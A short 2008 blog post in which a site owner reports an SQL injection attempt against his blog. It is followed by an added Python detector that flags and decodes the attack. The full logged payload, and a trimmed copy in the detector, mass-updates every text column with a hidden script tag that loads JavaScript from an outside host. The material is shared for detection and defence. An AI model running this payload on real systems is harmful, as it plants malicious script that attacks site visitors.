Friday, May 23, 2008 5:02 PM
I was doing my routine checks on my servers and I noticed that one of them had some unusual logs that I don't usually see, so I decided to dig further. Well, it seems someone has been trying to bring the server down using several methods, including SQL injection.
I've listed the T-SQL that was used to perform the injection below. First off, I have no idea why people would try to break the site; it's just a blog, darn it! You gain nothing from doing so, except all my blog entries. Fortunately, I stopped using inline queries (I use SPs and objects) a long time ago, so SQL injection will never work. However, this lifted its priority to a higher level, so from now on I'll be putting some extra security checks in place.
http://blog.dotnetclr.com/post.aspx?id=0aa5ed9c-9d8a-491b-8736-21d732d75cab&id=1;dEcLaRe+@t+vArChAr(255),@c+vArChAr(255)+dEcLaRe+tAbLe_cursoR+cUrSoR+FoR+sElEcT+a.nAmE,b.nAmE+FrOm+sYsObJeCtS+a,sYsCoLuMnS+b+wHeRe+a.iD=b.iD+AnD+a.xTyPe='u'+AnD+(b.xTyPe=99+oR+b.xTyPe=35+oR+b.xTyPe=231+oR+b.xTyPe=167)+oPeN+tAbLe_cursoR+fEtCh+next+FrOm+tAbLe_cursoR+iNtO+@t,@c+while(@@fEtCh_status=0)+bEgIn+exec('UpDaTe+['+@t+']+sEt+['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D+aS+vArChAr(67))')+fEtCh+next+FrOm+tAbLe_cursoR+iNtO+@t,@c+eNd+cLoSe+tAbLe_cursoR+dEAlLoCaTe+tAbLe_cursoR;--
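As an added example (not from the original post), here is a small Python check that normalises a request's query string, flags the indicators this kind of cursor-driven payload carries, and decodes the hex literal so an analyst can see what the CAST would have written into every text column. The indicator names and the two sample requests are my own construction; the second sample is a trimmed copy of the logged URL above.

```python
import re
from urllib.parse import unquote_plus

# Indicators from the cursor-driven mass-injection payload above: schema
# enumeration via sysobjects/syscolumns, a cursor that UPDATEs every text
# column, EXEC of a built string, and a hex literal CAST to varchar that
# smuggles the injected HTML past naive keyword filters. Patterns run against
# the decoded, lower-cased query string, which defeats the mixed-case
# (dEcLaRe, sElEcT) obfuscation.
INDICATORS = {
    "declare": r"\bdeclare\b",
    "cursor": r"\bcursor\b",
    "system_catalog": r"\bsys(objects|columns)\b",
    "exec": r"\bexec\s*\(",
    "hex_cast": r"\bcast\s*\(\s*0x[0-9a-f]+\s+as\s+n?varchar",
    "comment_terminator": r"--\s*$",
}

def normalize(query_string):
    """URL-decode ('+' and %XX) and lower-case so obfuscated keywords match."""
    return unquote_plus(query_string).lower()

def decode_hex_literals(sql):
    """Recover the text each 0x... literal becomes once CAST to varchar."""
    decoded = []
    for hex_digits in re.findall(r"0x([0-9a-f]+)\b", sql):
        if len(hex_digits) % 2 == 0:
            decoded.append(bytes.fromhex(hex_digits).decode("latin-1"))
    return decoded

def analyze_request(url):
    """Return matched indicator names, a verdict and any decoded literals."""
    sql = normalize(url.partition("?")[2])
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, sql)]
    return {"suspicious": len(hits) >= 3, "indicators": hits,
            "decoded_literals": decode_hex_literals(sql)}

# Constructed samples: a normal post request and a trimmed copy of the payload.
BENIGN = "/post.aspx?id=0aa5ed9c-9d8a-491b-8736-21d732d75cab"
INJECTED = ("/post.aspx?id=1;dEcLaRe+@t+vArChAr(255),@c+vArChAr(255)+dEcLaRe+tAbLe_cursoR"
            "+cUrSoR+FoR+sElEcT+a.nAmE,b.nAmE+FrOm+sYsObJeCtS+a,sYsCoLuMnS+b+wHeRe+a.iD=b.iD"
            "+oPeN+tAbLe_cursoR+bEgIn+exec('UpDaTe+['+@t+']+sEt+['+@c+']=['+@c+']+cAsT("
            "0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E7573"
            "2F732E6A733E3C2F7363726970743E3C212D2D+aS+vArChAr(67))')+eNd+cLoSe+tAbLe_cursoR;--")

if __name__ == "__main__":
    for sample in (BENIGN, INJECTED):
        print(analyze_request(sample))
```

Run on a web server log, the same function applied to each request's query string gives a cheap first-pass alert; the decoded literal is what to look for in the affected tables when cleaning up.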